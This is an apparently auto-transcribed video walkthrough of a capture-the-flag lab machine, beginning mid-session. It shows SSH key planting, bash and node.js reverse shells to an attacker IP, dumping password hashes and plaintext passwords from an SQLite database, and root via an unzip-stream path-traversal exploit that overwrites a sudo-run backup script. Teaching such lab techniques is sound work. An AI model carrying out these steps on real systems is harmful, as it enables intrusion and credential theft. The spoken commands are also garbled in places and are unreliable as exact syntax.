view the authorization key again to make sure that it's written successfully. So we can recall this back. And then finally, we can just call the ID underscore RSA, which is the private key that we can use to SSH in. So let's do ID underscore RSA. And this would be view SSH. View private key. And so let's see if we have everything. So the first thing is that we want to list what we currently have inside the SSH directory for Git. And after that, we want to generate SSH and output that in this directory, and also have the authorized key. So we want to display what we have in the authorized key. So once we have that in place, right? Once we have that, we can then output the content of the public key into the authorized key, so that way we can SSH in from our local system. And also we want to read the authorized key, which is the authorized key, to make sure that the public key get successfully echoed or stored safe inside this authorization key. And finally, we have to output the RSA, which is the private key that we can use to SSH in. So let's go ahead and save this. So hopefully this is going to be the final lapse of the way to get in on the system, and then we can investigate as to why we are not able to get a reverse shell. So let's do this, and if we do commit, let's make sure the server is still running. Let me clean this up so we can get a fresh instance of all of the output. So let's go back here, and we can run this commits, and here we go. Everything seems successful. So this is the private key. So let's start from the top. So we're saying that we want to display what is inside the SSH key. So SSH didn't do anything, so there's nothing to display in it. So the next thing is the SSH key gen. So we generate the SSH key here. So once we generate the SSH key, it didn't display anything because we put it in quiet, not to display. Here we initially viewed the authorized key. There's nothing in the authorized key as well. So this is the public key, and we have the public key. We echo it inside the authorized key, which is what we have here. And finally, we print the private key. So let's go ahead and put this somewhere. We can kill this one now, and we can do via git SSH key and paste this one. We can do chmod 600 on git SSH key, and now we can do SSH git at DevArmor Lab, and then to specify the key, we can use git key, and let's see. Here we go. So we can now kill our server. So hopefully we're not going to need it anymore. So successfully we are able to get the SSH key. Generate the SSH key and use the SSH key to log in. So if we say who am I, we are git, and if we do if config, we see that we are definitely on the target machine. So now let's go back and let's clear this. I'm kind of curious as to why we're not getting the reverse shell earlier on. So we can just do nc lvnp 9001. So let's run that, and let's do bash dash I. No, let's do bash dash c, bash dash I. Let's do dev tcp 192.168.45.213, and let's do 9001 0 and 1. Let's see, and it hung. That's weird. So since we are able to reach our system on port 80, how about if we change this to port 80? Are we gonna get something? And let's listen here, and let's do port 80. And if we do this, booyah! Wow. So all this long route that we took earlier, we could have easily achieved the remote code execution by just changing the port to port 80. So I think that's the only port this system talks out of. So just important note for any of you guys that work in the machine. So changing the port will definitely make a good difference, but at least is you're able to gain something, spawning up your server that you can actually run a command and output the content of that command to make a post request to your server itself. So that's what that's the lesson that I can easily pick up from here for now. And let's go to the opt directory. So we saw some interesting folder, so let's see, and we can do, let's go to the FortiLock, right? Let's do cd into FortiLock, and also yeah, so we see db, let's see, file database.db. so we see that this is SQLite 3. They have SQLite 3 here. Let's see, I think I can kill this. I can also kill exit. I can clear this terminal, and also let me exit this. So we have this. So we have, let's see if they have SQLite 3. If not, we can pull this directly to our system. So they do. So let's do database.db and .tables. Let's do .databases, and we see that the database is this log, and then let's show the tables inside that. So we can do .tables, and we have the shared password, we have users, and we have votes. So let's do select star from these tables and nothing. How about we do select star from users, and here we go. So we have MC Sam, we have CISA, we have IE, and we have accuracy, and we have the password hash right here. So we can easily grab this, put it in files, and use SSH, use Hashcat or John the Ripper to actually crack those hashes. But let's copy this, put it in our notes for further cracking. Let's see, so let's create another one. Let's call this hashes, and we can paste this right here. So let me clean it up. We have the UUID. Do I need it? I do not. And we have the UUID of a user that we haven't seen, which is CISA. So let's copy this, and let's go back to our Bob suits, and let's see if we can get any information from here. Send, and we have, we have the the VPN, and also we have the mail server. So the username would be CISA190, and okay, so we can also add this to our VPN, our host file, and also look at what we can get from here. So if we hit any roadblock, we can come here and continue the path from here. But it's what interesting that we also discover another subdomain, which is the VPN. And let's go back. So these are the password hashes. So we currently viewing what we have in users. So let's also select what we have in vert. Select star from vert, and this is kind of messy, but off the bat I see that the passwords are here in plain text. So it's another findings here that we can report. right? So the password is stored or saved in plain text. So since we already know this, we know this is Gog, right? And this is another password for the Caesar user, and this is the same password, and this is another password for MC Sam. So we can copy this. This is our password. We already know our password: security $123 security $. So interestingly, we can just go back here and notate this password for MC Sam, and paste this one here. And let's see, can we SSH in or change user to this user privilege? So we can so let's do exit. Let's do .quit. Okay, so let's clear this and let's do su MC Sam, and let's clear this su MC Sam, and let's go paste the password. No, not that one. DevSecOps 2025, and we can go ahead and paste the password here. And here we go. So we're able to log in as MC Sam. So if we do ls, and let's do MC Sam ls, so this should be the flag itself. And let's see, sudo -l, let's see what privilege this user has. So this user can run backup manager, right, with no password. So if we do ls-leh on this file, we see that there's a symlink to this zip.backup.js. So let's cd into this directory. So cd and let's clear this up, ls, and let's do zip.js. What is it doing? So it's a DevArmor backup manager. So the tool allows you to securely manage zip file backups for DevArmor. You can back up a zip, list existing backups, view the content of the backups, zip, and also retrieve backup, and then allows operations that are performed securely. So let's see. I'm trying to view the code. So it requires unzip-stream, readline, and this will be the backup directory. This is where the file will be backed up. And let's see, so we can back up a file, list the file in the backup directory, and view the contents. So let's check something. So let's go to, let's cut package.json, the description, a Node.js script for backing up, list and viewing content of a zip, and we have the unzip-stream version. We can also check this one if it's vulnerable to any public exploits. So we can do google.com, okay, so let's do unzip-stream, unzip-stream, Okay, so we see that there is vulnerability here, and we can upload this. Okay, so we also have this, the MC-SAM GitHub. So I guess this is the creator of the lab itself. So we can view some of the things that has in place. But for the vulnerability itself, right? So the unzip-stream, it's a library used by applications to automatically extract zip archive. So under normal circumstances, right, when a zip file is extracted, all files should remain within the intended destination. However, the version that we currently have here is affected by the CV, also published, I think this, yeah, 2024, right? So this is when it was published. So, and the root cause of this issue is improper handling of the directory traversal sequence within the zip archives, right? So an attacker can create a malicious zip file containing a file path that transverse out of the like so, right? So the attacker can transverse out of this path that instruct the extraction process to write files outside of the intended directory. So instead of extracting files only where the application expects them, the vulnerable library can be tricked into writing files into arbitrary location on the file system. So this means that if a privileged process extracts the malicious archive, an attacker may be able to overwrite sensitive files, modify application data, or plant files that will later be executed by the system. So in our case, we abuse this vulnerability to overwrite a file that is later processed by a privileged backup service. So when that service runs, it executes our modified content and then allows us to escalate privilege and gain root access on this machine. So the whole process is right here. So we have the exploit code. So this is the whole Python script that's going to be run. And then there's this modification you have to do in order for this exploit to work. You have to modify the zip file module and then comment out the hack name here. So something like this. So when you open it, you just look for the hack name. This exact path is what it's gonna make the exploit to work. If you do not do this, it's not going to work. And let's just try this out. Copy this, right? Let's copy and go on to the server. Let's go on to the server. Let's go on to the server and see what we can do here. Give me 1 second. I'm trying to see. Let's see if we can exploit this one. Yeah. Let's see. We have to grab this out. Okay, let's do VI. Let's put this in the VSHM. So let's do VI exploits.py and let's paste this. So let's do to see. Okay, so if we try to run this, let's do exploit.py, module OS, let's see, let's go to the one we have in, why is exploit.db not working? Okay, yeah. So we see it's the same instruction. It says to bypass this restriction, you have to modify the zip file path. So let's copy this and let's try this on our local machine first to make sure everything is working perfectly. So yeah, we have exploit here. So yeah, I unzip.py and we can run this. Python 3, we have unzip py. Oh, so it says the zip, the POC does not exist. So if we look at what it's doing, so let's do unzip. We have to create a file, right? The POC.zip, and then the path name that is going to override this file into. So let's change this to DevArmor and let's now create a file called this POC, and let's just do pond or you've been hacked, right? So if we run this now, that should literally zip what we have in this POC, and when we extract it, if we extract it, then we should get the POCC written in to this directory called, let me see, so if we view ls-lhg dev-shm, so we should see the content here, the POCC. So let's go ahead and modify our zip file first. So locate zip file.py, and it's gonna be inside the Python 3 module. So it's gonna be inside here. So yeah, for Python 3, so let's have this. We have it in Python 2. We also have it in PyZipper. So let's do, we can modify it in end of this, right? In end of this Python environment. So let's just do mouse pad this, and let's do arc name. So this is what we have to comment out, this part. So if we do arc name and this, so let's go back. Whoop, no, that's not what I want to do. Yeah, so I thought I was within Vim, so let's close this and let's try and run this first and see if it works. If it doesn't, then we change this in this library as well. So let's also modify this since we're using Python 3. So let's do mousepad, and let's do this as well. And let's do arc name, and let's change this as well. So let's save this and then close this. So now let's go back to our file. So if we run Python 3 unzip.py, so it says that the file has been zipped. So if we do ls, we see the file. So if we do unzip -l, do this, so it's still not working, because in order for this exploit to work, it has to look like this. Let's go back to the article itself. So it says the content of the zip file should look like this after running the exploit. So we run the exploit, but it doesn't look like this, so meaning that this is not working. So what we can do is it's possibly running this on the same exact environment where this jar payload was run. So what we have to do is let's see, kind of thinking what we can do. Let's go back to the terminal and let me open another fresh tab. And since this was run on Python 10, let me see. Yep. So let's on 10. So let's go back. But before I do that, let me revert my changes back. I think I did this one, so I don't want to leave my system. So this should be fine. And also change the other one. Nope, not this. And we have the packet, this one. So let me change this one as well. So those are the two changes. Now everything back to its normal state. So and now we can then follow this step to install the Python 10. So let's go here, this current directory, and let's do py environment. We have it. No, we do not. So let's install it first. Okay, so it's installed. So we can do py env install 3.10.20. Let's see. Let's do install Python. Okay, so let's do pyenv --version. So do we do versions? so let's go back here and see what has this. Let's see how we can go about that. So let's see, close this one, and right here at the bat, so we do let me see, let's go back to our time now, right? So let's do Python, let's do apt install Python 3.10. Is that gonna work? No. So let's just run crawl https and then run env.run and then pipe it to bash. Okay, so we have that. Now let's do export env, let's go roots, and then let's do this as home, and do env, and also let's export path to be env root bin, and then we can echo our existing path. And if we eval, let's do eval env and init and env, let's do local 3.10 20. Okay, it says 3.20 is not installed, so let's do, how do we get this installed? Should we just do apt install Python 3.10? That's gonna work. No, so in this case we probably have to run let's run this, see all available list. So let's do install, we do 3.20. Yes, yeah, so we installing that right now. Hopefully it's not going to take that long for the installation to complete, and then after the installation is complete we can go back and try and replicate the same process and see if we can overwrite a file. So possibly we can while we have that running, We can also continue other enumeration on the system, so we can get limpis. Let's see, we get http as limpis. Let's go grab limpis really quick, so that way while we have that running, we can have other thing running as well. So limpis GitHub, and this one right here, and this was last updated 2 weeks ago. You can just copy this, copy link address, and we can go back, wget, and this. And while we have that, we can just do nc-lvnp. Since it only talk on port 80, we can have there. And then we want anybody that connects to us, we want to feed it with limpis.sh. And here now we want to connect to this. Let's do nc 192.168.45.213, and we want to connect on port 80, and anything that we get, we want to impute that, redirect that into limpis.sh. So wait a few seconds, and we can just close it out, and we can do chmod plus c and have this as limpis.sh, and now we can just do bash limpis.sh, so that will run the automated scripts, and we can review the result later. But let's go back to what we're doing. So we see that the installation is already completed for this. So now we can as well just say pyenv. Let's do pyenv, and we want to check, let's do local this. So now we set this to local, and I don't want to make it global, so that way this Python will not affect other dependencies that I have running within my environment. So I can just do python dash version, still have 3.13, about python 3 dash version, still 3.13, it should be 3.10. Yeah, but it already installed this. Yeah, it installed this on system. So let's do which Python, and let's do a list. Pyenv, let's do versions. Okay, 3.10.20. Right, so, and let's do pyenv local. I want to do 3.10.20, and then let's do pyenv version again. so it already set the directory here since we have it local. So now I want to make sure that this is initialized, so I want to export again pyenv and yep. So and then I want to export path and close to this. See, this will be $sign pyenv roots bin, and this should be just trying to make this work without breaking other things I have on my system, and then we can have this as run as path. And if I run evar again, and if I do this and which Python, this should give us what we have. Yep, so it's running the Python from this directory. And then if we say Python version, if I say which Python version, so it's just gonna be Python, let's see, so give me 1 second. So if I run this again, so give me 1 second. So if I run this one, trying to see if we run Python 3 or which Python 3, we see that it's running Python 3 from this environment. So we can just say Python dash version. This should give us 3.10. Yes, we have 3.10. We should have 3.10. And if we do have Python 3, so we have 3.10. So we have this running, and we can confirm that this is 3.10. Yeah, so sorry about that. So we can definitely go and run our exploit now. So if we do unzip, so let's remove the zip. Let's remove the evo.zip. And now if we do Python 3, and then if we run the unzip.py again, so it says it's been zipped. So if we do ls, and then if we do unzip, if we do unzip -l and then do evo.py, so still oh, so the reason why this one is not working now, I get it now. So let's go ahead and remove this, remove the evo.zip. So recall that we still have to modify the what's it called? We still have to modify the zip file path in order for this to work, because if we do not modify that zip file path, it's not going to work for us. So what we have to do now is go back to this terminal where we have our Python. Remember, you still need to have it running in version 10 3.10 in order for this to work. So we can say, make sure which Python we're still working on. Yeah, this, and you can say Python -- version, Python -- version. So we have 3.10.20. So now we can just easily go to Python 3 or Python C, and we want to import zip file, and then we want to print zip file dot file, and that should work. And let's change this also to make sure it's same. Yeah, so now we have this zip.py in this folder. So this is what we want to modify now. So if we just do mousepad and do this, and we can now check for the arc name. So we can search for arc name and check this out, and we can comment this out, and then we can save. So now if we go back and run the zip again, we can just do Python 3 unzip, and if we do ls, let's do unzip -l unzip. Now we see that we have the hack, which is pretty much similar to what we have for the exploit to work. So now if we go back here, we still see the content of our DevArmor. So we see it here, and if we try to unzip, so when we unzip this folder, the normal intended path would be for this evo-zip to extract in this current folder, but what we have next is that this will be extracted in the DevArmor. So if we do unzip and do evo.zip, this will definitely be in our DevArmor POCC. And if we go here and if we run this again, if we run DevArmor, do we still have it there? No. If we do ls, we have hack, and then cd arc DevArmor, and we have POCC. So if we cut this POCC, we see you've been hacked. So now what I want us to do is pretty much go to this folder. So since we have control of this, we can go back here and go back here. Let's do let's remove evil.zip. So let's modify the exploit. Let's modify the exploit now. .py. So what I want to do is no, this is not the exploit.py. We have to edit unzip.py, and when we are zip.py, we can just go to the file path, right, that we want. It's shell. So we want to do shell dot perl, or yeah, let's just do shell, right? And then this we want to overwrite, since we have sudo privilege on backup manager, right? So which backup manager, since we have this, and then if we do ls dash ls on this, if we do ls dash ls on this, we have this. So this is what I want to overwrite, right? So the backup.sh. But before I overwrite that, I want to get a copy of this somewhere, right? So that way, in case we mess up things, we can revert back to its original state. So this is probably safe. So we can just put this in zip as backup via zip dash backup.js, and then we can have this here. And now let's go back to this file path. So this is what we want to overwrite. So we can go ahead, copy this, and come to here, which is this, change it to this. So we want to create a file that has shell, right? And it's going to zip it, name the file as evil.zip, and this is the path that we want to overwrite. So whatever we put in this shell, we replace this, and since we already have sudo privilege to run the backup on this particular file, then we should be able to get a reverse shell on it. So let's go ahead and save this and ls. So if we do python 3, if we have unzip, now we have there's no file, shell does not exist, so we have to go create a shell file. So in order for us to do that, we can easily go to rev shells.com, and we can put our IP address 192.168.45.213, and since the system only talks out on port 80, we change this to port 80, and we know that that is .js, so we're talking about a node, so node.js. So I'll definitely pick this one. So I can go ahead, copy this, go to a terminal, and then we can have view shell, right? And just paste this. So let's go back again to the terminal itself. So we can do see user bin environment node. So we can just do user bin env node, and then we can paste this. And if we do this, for us to test if our shell is actually working, so we have to run nc-l-lvnp on port 80, and then let's do bash shell. Let's see if that's gonna work. Or let's do node shell. Okay, so now we see that we get a reverse shell, so we know that this is actually working. So if we cancel this, let's go back again. So we have to listen on NC LVMP port 80 in order for us to get a reverse shell, and when everything works successfully on the system, we have node it's going to run node shell, and that should trigger the reverse shell. So that's it. So now we have a shell. Let's go create the zip file, exit this, and we can run python 3 unzip.py, and that literally creates the evu.zip. So now let's make sure we have our listener running, and also let's first kill this and transfer this to the system first. So let's do python 3 -m 8.m http server 80, and now we want to let's exit this out, and let's do wget http 192.168.45.213, and let's do shell.zip. No, it's evu.zip. That's the name of the file, evu.zip. And we have the evu.zip pulled over here. So let's kill this, and let's start our reverse shell and this particular port. So we can do nc-lvmp np port 80, and when we run that, we can list this. And now let's just do sudo backup manager, which will run the backup instance, right? So now we want to run a zip, so we have one, and it's asking us the files that we want to back up. So we do evu.zip. So we see that it successfully backed up the evu.zip. So we can do 2 to list the content of the file. So it says we have the evu.zip and we have the website.zip. So in order for us to trigger this vulnerability, we need to force it to extract the content, right? So when we click on when we follow through the 3 to view the content, it will force itself to extract. We didn't even bother to check if this extraction works. So we can do ls, we can do unzip -l evu.zip, and okay, yeah, so it's gonna work. So because when it get extracted, right, it's gonna go outside of this path and then overwrite whatever we have in this backup .js. So that's what's going to happen now. So when we do 3, and then we want to extract zip evu.zip, and here we go. It says it extracts. Let's see. Evu.zip, that should literally trigger this to work. Let's see, why is it not working? Backup.sh. So okay, yeah, so what happened is that it successfully overwrote what we have in the content, and we can double check that. So if we go and do let's go back to cd opt dev, right? And then if we do cat zip.backup, so we notice that it's going to have our reverse shell. So this is the reverse shell now. We have the previous file overwritten by our payload. So now to trigger and get a reverse shell, all we just have to do is run sudo backup manager and we should get a shell. Here we go. So this is our shell. We can see who am I, and we can just get stable shell, import pty dot spawn pty.spawn bin bash, and that's it. And st2y export time goes to s time, and we can clear this. It says st2y rows 49 colors 1 and 9, and this should fix the wrapping. So if we have this, that should continue to wrap. Here we go. So it's fixed. So pretty much that's how you solve the machine. Sorry it took that long for us to fix it, but in order for you to get the root, you have to literally create a virtual environment, run Python 3.10. Any Python 3.10 should literally solve it for you, and that's how you get root on this machine. So if you go to cd root and do ls, and this will be your proof.txt. So that's how you solve the machine. Thank you all guys for watching, and I hope I see you next time. Bye for now.